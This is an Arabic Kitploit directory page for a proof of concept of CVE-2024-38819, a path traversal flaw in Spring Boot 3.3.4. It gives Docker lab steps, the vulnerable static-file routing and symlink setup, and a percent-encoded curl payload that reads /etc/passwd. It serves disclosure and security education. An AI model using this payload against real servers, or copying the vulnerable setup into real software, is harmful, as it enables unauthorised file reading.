Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-38819-POC — إثبات مفهوم يوضح استغلال اجتياز المسار في Spring Boot 3.3.4 عبر الروابط الرمزية واجتياز الدلائل المشفّر بنسبة مئوية، لأغراض البحث الأمني والتعليم. | Kitploit
أدوات/GitHubGitHub/masa42/cve-2024-38819-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubmasa42/cve-2024-38819-poc

CVE-2024-38819-POC

إثبات مفهوم يوضح استغلال اجتياز المسار في Spring Boot 3.3.4 عبر الروابط الرمزية واجتياز الدلائل المشفّر بنسبة مئوية، لأغراض البحث الأمني والتعليم.

عرض المستودع
39151منذ سنة واحدةتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-38819: إثبات المفهوم (PoC)

هذا إثبات مفهوم لثغرة CVE-2024-38819، والتي قمت بالإبلاغ عنها، ويوضح استغلال اجتياز المسار (path traversal).

خطوات التنفيذ

  1. قم ببناء صورة Docker (Spring Boot 3.3.4، استنادًا إلى Spring Framework 6.1.13)

    cd vuln
    docker build -t cve-2024-38819-poc .
    
  2. قم بتشغيل الحاوية واكشف المنفذ 8080 إلى الجهاز المضيف

    docker run -d -p 8080:8080 --name cve-2024-38819-poc cve-2024-38819-poc
    
  3. نفّذ الأمر التالي لتشغيل الـ PoC وتأكيد الثغرة

    curl http://localhost:8080/static/link/%2e%2e/etc/passwd
    

    إذا نجح الهجوم، سيتم عرض محتويات ملف /etc/passwd.

الشرح

  1. أنشئ PathTraversalDemoApplication.java بالكود التالي لإعداد توجيه الملفات الثابتة باستخدام RouterFunction وFileSystemResource:

    public RouterFunction<ServerResponse> staticResourceRouter() {
        return RouterFunctions.resources("/static/**", new FileSystemResource("/app/static/"));
    }
    
  2. أضف الأمر التالي إلى ملف Dockerfile لإنشاء رابط رمزي (symbolic link):

    RUN ln -s /static /app/static/link
    
  3. أنشئ حمولة (payload) تستفيد من ترميز النسبة المئوية (percent-encoding) لاجتياز الدلائل عبر الرابط الرمزي.

    • المسار: /static/link/%2e%2e/etc/passwd
  4. استخدم أمر curl التالي لتنفيذ الـ PoC والتحقق من نجاح الهجوم:

    curl http://localhost:8080/static/link/%2e%2e/etc/passwd
    

    إذا نجح الهجوم، سيتم عرض محتويات ملف /etc/passwd.

إخلاء المسؤولية

تم توفير إثبات المفهوم هذا لأغراض تعليمية وبحوث أمنية. قبل استخدامه على نظام حقيقي، تأكد من معالجة الثغرة ومن حصولك على التفويض المناسب. لا يتحمل المؤلف أي مسؤولية عن أي إساءة استخدام لهذا الكود.

تنزيل الأداة